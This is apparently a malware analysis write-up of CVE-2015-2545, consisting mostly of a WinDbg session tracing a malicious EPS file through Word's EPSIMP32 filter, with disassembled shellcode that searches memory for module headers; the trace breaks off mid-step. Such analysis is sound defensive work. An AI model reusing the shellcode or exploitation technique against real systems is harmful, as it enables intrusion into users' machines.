[Analysis] CVE-2015-2545


![exploit-000](https://user-images.githubusercontent.com/7352479/29016460-831bac08-7b20-11e7-94c7-b6628f7dca1c.png)

<img width="961" alt="plugin-002" src="https://user-images.githubusercontent.com/7352479/29016547-d39cd86e-7b20-11e7-8fba-6017484ccfa8.png">

<img width="961" alt="plugin-003" src="https://user-images.githubusercontent.com/7352479/29016524-c43d4afc-7b20-11e7-9429-7a97add21044.png">

<img width="964" alt="igfx-002" src="https://user-images.githubusercontent.com/7352479/29016579-f2c9d728-7b20-11e7-95cf-86077ef2b443.png">


```
*** wait with pending attach

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is: 
ModLoad: 2fe80000 2fee6000   C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
ModLoad: 77570000 776ac000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 77350000 77424000   C:\Windows\system32\kernel32.dll
ModLoad: 75880000 758ca000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 76390000 76430000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 760d0000 7617c000   C:\Windows\system32\msvcrt.dll
ModLoad: 76450000 76469000   C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76180000 76221000   C:\Windows\system32\RPCRT4.dll
ModLoad: 6c660000 6c6fb000   C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
ModLoad: 755b0000 755fc000   C:\Windows\system32\apphelp.dll
ModLoad: 6d390000 6d40b000   C:\Windows\AppPatch\AcSpecfc.DLL
ModLoad: 75590000 755ab000   C:\Windows\system32\SspiCli.dll
ModLoad: 6f1e0000 6f264000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll
ModLoad: 76240000 7628e000   C:\Windows\system32\GDI32.dll
ModLoad: 76290000 76359000   C:\Windows\system32\USER32.dll
ModLoad: 75b60000 75b6a000   C:\Windows\system32\LPK.dll
ModLoad: 75f60000 75ffd000   C:\Windows\system32\USP10.dll
ModLoad: 70260000 702d9000   C:\Windows\system32\mscms.dll
ModLoad: 74d40000 74d57000   C:\Windows\system32\USERENV.dll
ModLoad: 75680000 7568b000   C:\Windows\system32\profapi.dll
ModLoad: 776c0000 77717000   C:\Windows\system32\SHLWAPI.dll
ModLoad: 75cf0000 75e4c000   C:\Windows\system32\ole32.dll
ModLoad: 76700000 7734a000   C:\Windows\system32\SHELL32.dll
ModLoad: 739c0000 739f2000   C:\Windows\system32\WINMM.dll
ModLoad: 6c820000 6c907000   C:\Windows\system32\DDRAW.dll
ModLoad: 744d0000 744d6000   C:\Windows\system32\DCIMAN32.dll
ModLoad: 759c0000 75b5d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75900000 75927000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 76000000 7608f000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 75860000 75872000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 73f50000 73f63000   C:\Windows\system32\dwmapi.dll
ModLoad: 710d0000 710e2000   C:\Windows\system32\MPR.dll
ModLoad: 77720000 7779b000   C:\Windows\system32\COMDLG32.dll
ModLoad: 76430000 7644f000   C:\Windows\system32\IMM32.dll
ModLoad: 75b70000 75c3c000   C:\Windows\system32\MSCTF.dll
ModLoad: 76090000 760c5000   C:\Windows\system32\WS2_32.dll
ModLoad: 76230000 76236000   C:\Windows\system32\NSI.dll
ModLoad: 6ded0000 6e110000   C:\Windows\system32\msi.dll
ModLoad: 64020000 65168000   C:\Program Files\Microsoft Office\Office12\wwlib.dll
ModLoad: 66e80000 67de8000   C:\Program Files\Microsoft Office\Office12\oart.dll
ModLoad: 685a0000 69627000   C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll
ModLoad: 6c920000 6c9f7000   C:\Program Files\Microsoft Office\Office12\1033\wwintl.dll
ModLoad: 74330000 74370000   C:\Windows\system32\uxtheme.dll
ModLoad: 744e0000 7467e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32.dll
ModLoad: 62f90000 635e5000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSORES.DLL
ModLoad: 6c560000 6c61a000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
ModLoad: 6fc30000 6fc47000   C:\Windows\system32\DavClnt.DLL
ModLoad: 6fae0000 6fae8000   C:\Windows\system32\DAVHLPR.dll
ModLoad: 5e420000 5edfd000   C:\Program Files\Common Files\Microsoft Shared\office12\1033\MSOINTL.DLL
ModLoad: 6d2e0000 6d32a000   C:\Windows\system32\mscoree.dll
ModLoad: 6ca00000 6ca7d000   C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
ModLoad: 74a50000 74a59000   C:\Windows\system32\VERSION.dll
ModLoad: 75600000 7560c000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 6fff0000 70041000   C:\Windows\system32\Winspool.DRV
ModLoad: 6cb20000 6cbda000   C:\Windows\system32\spool\DRIVERS\W32X86\3\unidrvui.dll
ModLoad: 6c520000 6c558000   C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdui.DLL
ModLoad: 76670000 766f3000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 683c0000 684c5000   C:\Program Files\Common Files\Microsoft Shared\office12\riched20.dll
ModLoad: 743a0000 74495000   C:\Windows\system32\propsys.dll
ModLoad: 73d00000 73d21000   C:\Windows\system32\ntmarta.dll
ModLoad: 75ca0000 75ce5000   C:\Windows\system32\WLDAP32.dll
ModLoad: 6a1a0000 6a2f5000   C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll
ModLoad: 751d0000 751e7000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 74eb0000 74eeb000   C:\Windows\system32\rsaenh.dll
ModLoad: 75670000 7567e000   C:\Windows\system32\RpcRtRemote.dll
ModLoad: 75610000 7566f000   C:\Windows\system32\SXS.DLL
ModLoad: 6c460000 6c517000   C:\Program Files\Microsoft Office\Office12\msproof6.dll
ModLoad: 68050000 680d7000   C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80.dll
ModLoad: 3f100000 3f401000   C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL
ModLoad: 66db0000 66e71000   C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdrv.dll
ModLoad: 6e7b0000 6e7c4000   C:\Windows\system32\FontSub.dll
(cd0.a04): Break instruction exception - code 80000003 (first chance)
eax=7ffd4000 ebx=00000000 ecx=00000000 edx=7760f125 esi=00000000 edi=00000000
eip=775a40f0 esp=04b4f78c ebp=04b4f7b8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
ntdll!DbgBreakPoint:
775a40f0 cc              int     3
0:010> ba r4 ZwProtectVirtualMemory
0:010> g
(cd0.e50): Unknown exception - code e0000002 (first chance)
(cd0.e50): Unknown exception - code e0000002 (first chance)
ModLoad: 62e00000 62f8b000   C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL
ModLoad: 73e00000 73e0d000   C:\Windows\system32\WTSAPI32.DLL
ModLoad: 75690000 756b9000   C:\Windows\system32\WINSTA.dll
ModLoad: 6fad0000 6fad9000   C:\Windows\system32\LINKINFO.dll
ModLoad: 6e8a0000 6e910000   C:\Windows\system32\ntshrui.dll
ModLoad: 75330000 75349000   C:\Windows\system32\srvcli.dll
ModLoad: 6e940000 6e94b000   C:\Windows\system32\cscapi.dll
ModLoad: 73900000 7390a000   C:\Windows\system32\slc.dll
ModLoad: 63bb0000 63c1f000   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT - 
Breakpoint 0 hit
eax=000000b8 ebx=04371f01 ecx=775b5f18 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed2a0 esp=002bc7a0 ebp=002bc7dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3e:
63bed2a0 8975d4          mov     dword ptr [ebp-2Ch],esi ss:0023:002bc7b0=00000000
0:000> ub eip
EPSIMP32!RegisterPercentCallback+0x15c23:
63bed285 3b482c          cmp     ecx,dword ptr [eax+2Ch]
63bed288 7d21            jge     EPSIMP32!RegisterPercentCallback+0x15c49 (63bed2ab)
63bed28a 8b5024          mov     edx,dword ptr [eax+24h]
63bed28d 8b12            mov     edx,dword ptr [edx]
63bed28f 8b5220          mov     edx,dword ptr [edx+20h]
63bed292 035028          add     edx,dword ptr [eax+28h]
63bed295 c745d003000000  mov     dword ptr [ebp-30h],3
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]
0:000> bc 0
0:000> bp 63bed29c "u edx+ecx;r;g;"
0:000> bp ntdll!NtCreateEvent+0x5 ".if(eax == 0x45){g;}"
0:000> g
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000            add     byte ptr [eax],al
775b5f1d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc718 ebp=002bc754 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
775b5f34 c20800          ret     8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc6a4 ebp=002bc6e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1c=00
ntdll!ZwProtectVirtualMemory+0x1:
775b5f19 d7              xlat    byte ptr [ebx]
775b5f1a 0000            add     byte ptr [eax],al
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
eax=043720b0 ebx=04371f01 ecx=775b5f19 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f19=d7
ntdll!ZwProtectVirtualMemory+0x2:
775b5f1a 0000            add     byte ptr [eax],al
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1a edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1a=00
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000            add     byte ptr [eax],al
775b5f1d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f    add     byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12            call    dword ptr [edx]
775b5f24 c21400          ret     14h
775b5f27 90              nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000      mov     eax,0D8h
775b5f2d ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12            call    dword ptr [edx]
775b5f34 c20800          ret     8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a        movzx   eax,byte ptr [edx+ecx]     ds:0023:775b5f1c=00
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=000000d7 ebx=04371fa0 ecx=061e0f08 edx=0011f5c8 esi=0011ea78 edi=00000000
eip=775b55ad esp=061e0f62 ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!ZwCreateEvent+0x5:
775b55ad ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
0:000> dd esp
061e0f62  061e2f08 ffffffff 061e0108 061e010c
061e0f72  00000040 061e0110 00000000 00000000
061e0f82  00000000 00000000 00000000 00000000
061e0f92  00000000 00000000 00000000 00000000
061e0fa2  00000000 00000000 00000000 00000000
061e0fb2  00000000 00000000 00000000 00000000
061e0fc2  00000000 00000000 00000000 00000000
061e0fd2  00000000 00000000 00000000 00000000
0:000> g poi(esp)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f08 esp=061e0f7a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f08 60              pushad
0:000> uf eip
Flow analysis was incomplete, some code may be missing
061e2f08 60              pushad
061e2f09 64a100000000    mov     eax,dword ptr fs:[00000000h]
061e2f0f 8b4004          mov     eax,dword ptr [eax+4]
061e2f12 250000ffff      and     eax,0FFFF0000h

061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh
061e2f1c 7517            jne     061e2f35  Branch

061e2f1e 81783c00020000  cmp     dword ptr [eax+3Ch],200h
061e2f25 730e            jae     061e2f35  Branch

061e2f27 8b503c          mov     edx,dword ptr [eax+3Ch]
061e2f2a 03d0            add     edx,eax
061e2f2c 66813a5045      cmp     word ptr [edx],4550h
061e2f31 7502            jne     061e2f35  Branch

061e2f33 eb07            jmp     061e2f3c  Branch

061e2f35 2d00000100      sub     eax,10000h
061e2f3a ebdb            jmp     061e2f17  Branch

061e2f3c 8b7a1c          mov     edi,dword ptr [edx+1Ch]
061e2f3f 8b722c          mov     esi,dword ptr [edx+2Ch]
061e2f42 03f0            add     esi,eax
061e2f44 03fe            add     edi,esi

061e2f46 83ed04          sub     ebp,4
061e2f49 8b4d00          mov     ecx,dword ptr [ebp]
061e2f4c 3bce            cmp     ecx,esi
061e2f4e 7218            jb      061e2f68  Branch

061e2f50 3bcf            cmp     ecx,edi
061e2f52 7314            jae     061e2f68  Branch

061e2f54 8079fdff        cmp     byte ptr [ecx-3],0FFh
061e2f58 750e            jne     061e2f68  Branch

061e2f5a 8079fe50        cmp     byte ptr [ecx-2],50h
061e2f5e 7508            jne     061e2f68  Branch

061e2f60 8079ff10        cmp     byte ptr [ecx-1],10h
061e2f64 7502            jne     061e2f68  Branch

061e2f66 eb02            jmp     061e2f6a  Branch

061e2f68 ebdc            jmp     061e2f46  Branch

061e2f6a 896c2418        mov     dword ptr [esp+18h],ebp
061e2f6e 61              popad
061e2f6f 87e1            xchg    esp,ecx
061e2f71 60              pushad
061e2f72 8bec            mov     ebp,esp
061e2f74 e800000000      call    061e2f79
061e2f79 8b3424          mov     esi,dword ptr [esp]
061e2f7c 8d642404        lea     esp,[esp+4]
061e2f80 81ee71000000    sub     esi,71h
061e2f86 81c6a0000000    add     esi,0A0h
061e2f8c 68dc000000      push    0DCh
061e2f91 59              pop     ecx
061e2f92 8d3c8e          lea     edi,[esi+ecx*4]
061e2f95 6a1f            push    1Fh
061e2f97 58              pop     eax
061e2f98 d12f            shr     dword ptr [edi],1
061e2f9a d116            rcl     dword ptr [esi],1
061e2f9c 83c604          add     esi,4
061e2f9f 48              dec     eax
061e2fa0 7506            jne     061e2fa8  Branch

061e2fa2 6a1f            push    1Fh
061e2fa4 58              pop     eax
061e2fa5 83c704          add     edi,4

061e2fa8 7177            jno     061e3021  Branch

061e2faa b245            mov     dl,45h
061e2fac 2c98            sub     al,98h
061e2fae c52d86c52d0e    lds     ebp,fword ptr ds:[0E2DC586h]
061e2fb4 c529            lds     ebp,fword ptr [ecx]
061e2fb6 844521          test    byte ptr [ebp+21h],al
061e2fb9 90              nop
061e2fba c50d409c3600    lds     ecx,fword ptr ds:[369C40h]
061e2fc0 3980ba04403c    cmp     dword ptr [eax+3C4004BAh],eax
061e2fc6 023b            add     bh,byte ptr [ebx]
061e2fc8 803100          xor     byte ptr [ecx],0
061e2fcb 3a88409c2680    cmp     cl,byte ptr [eax-7FD963C0h]
061e2fd1 29803aef403c    sub     dword ptr [eax+3C40EF3Ah],eax
061e2fd7 022b            add     ch,byte ptr [ebx]
061e2fd9 802100          and     byte ptr [ecx],0
061e2fdc 3a6b29          cmp     ch,byte ptr [ebx+29h]
061e2fdf 7428            je      061e3009  Branch

061e2fe0 2800            sub     byte ptr [eax],al

061e2fe1 0000            add     byte ptr [eax],al
061e2fe3 00c5            add     ch,al

061e2fee 292b            sub     dword ptr [ebx],ebp
061e2ff0 2b740000        sub     esi,dword ptr [eax+eax]
061e2ff4 0080451e92c1    add     byte ptr [eax-3E6DE1BBh],al
061e2ffa e301            jecxz   061e2ffd  Branch

061e2ffc c1737e5c        sal     dword ptr [ebx+7Eh],5Ch

061e2ffd 737e            jae     061e307d  Branch

061e2fff 5c              pop     esp

061e3000 aa              stos    byte ptr es:[edi]
061e3001 aa              stos    byte ptr es:[edi]
061e3002 aa              stos    byte ptr es:[edi]
061e3003 2afe            sub     bh,dh
061e3005 99              cdq
061e3006 e424            in      al,24h
061e3008 f9              stc

061e3009 d7              xlat    byte ptr [ebx]
061e300a c01f33          rcr     byte ptr [edi],33h
061e300d 3333            xor     esi,dword ptr [ebx]
061e300f 333a            xor     edi,dword ptr [edx]
061e3011 fb              sti

061e3012 c16382c4        shl     dword ptr [ebx-7Eh],0C4h
061e3016 3e7ef9          ht jle  061e3012  Branch

061e3019 d7              xlat    byte ptr [ebx]
061e301a c01f33          rcr     byte ptr [edi],33h
061e301d 3333            xor     esi,dword ptr [ebx]
061e301f 333a            xor     edi,dword ptr [edx]

061e3021 fb              sti
061e3022 c17782c4        sal     dword ptr [edi-7Eh],0C4h
061e3026 3e7cc5          ht jl   061e2fee  Branch

061e3029 22fe            and     bh,dh
061e302b 45              inc     ebp
061e302c 2afc            sub     bh,ah
061e302e 15682fafad      adc     eax,0ADAF2F68h
061e3033 64e1aa          loope   061e2fe0  Branch

061e3036 45              inc     ebp
061e3037 7640            jbe     061e3079  Branch

061e3039 62627f          bound   esp,qword ptr [edx+7Fh]

061e3079 008023323a28    add     byte ptr [eax+283A3223h],al

061e307d 3a28            cmp     ch,byte ptr [eax]

061e307f 39b7b1203232    cmp     dword ptr [edi+323220B1h],esi
061e3085 b9b2393980      mov     ecx,803939B2h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f09 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f09 64a100000000    mov     eax,dword ptr fs:[00000000h] fs:003b:00000000=002bc95c
```

<img width="970" alt="mem-eax-001" src="https://user-images.githubusercontent.com/7352479/29017831-932f2aa6-7b26-11e7-80cd-e5db43969ac2.png">


```
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=002bc95c ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f0f esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f0f 8b4004          mov     eax,dword ptr [eax+4] ds:0023:002bc960=63c102c8
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c102c8 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f12 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
061e2f12 250000ffff      and     eax,0FFFF0000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63c10000=8bff
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a06
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c10000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a06
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63c00000=c63b
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63c00000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bf0000=0fc0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bf0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63be0000=75ff
0:000> t
